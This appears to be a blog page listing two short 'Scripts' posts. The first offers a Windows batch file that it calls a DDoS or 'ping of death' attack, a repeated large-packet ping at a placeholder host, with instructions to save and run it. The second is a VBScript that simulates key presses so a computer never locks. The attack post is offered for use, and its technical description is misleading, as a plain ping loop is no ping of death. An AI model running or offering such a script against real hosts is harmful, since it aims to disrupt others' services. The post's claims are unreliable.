Posts

Showing posts with the label Scripts

DDOS attack - Script

Image
Command to do a DDOS attack: --> This is also called as the ping of death attack Copy the below script into notepad and save it to .bat file.  Script: @echo off ping -n 2000 -l 500 <www.example.com> Then double click on bat file, DDOS attack will start 

Windows screen auto unlock - Script

Image
To keep the laptop screen idle, without the lock. Script: Set WshShell = WScript.CreateObject("WScript. Shell") While 1 WshShell.SendKeys "{SCROLLLOCK}" WScript.Sleep (15000) Wend Set WshShell = Nothing Save it .vbs and double-click and won't lock the screen.